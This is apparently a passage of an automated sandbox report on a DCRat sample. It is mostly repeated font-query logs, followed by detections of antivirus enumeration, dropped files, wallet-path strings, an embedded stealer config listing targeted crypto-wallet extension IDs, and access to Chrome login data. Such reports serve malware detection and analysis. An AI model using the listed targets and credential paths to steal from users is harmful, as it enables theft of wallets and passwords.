                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3030189423.000000001B72D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: zZ1Y43bxxV.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.zZ1Y43bxxV.exe.d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: zZ1Y43bxxV.exe PID: 6164, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: wnWNWNYIxJtFiUSDRXunzX.exe PID: 7744, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\UserOOBEBroker.exe, type: DROPPED
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\8
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: powershell.exe, 00000001.00000002.2704131588.00007FFD9BA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
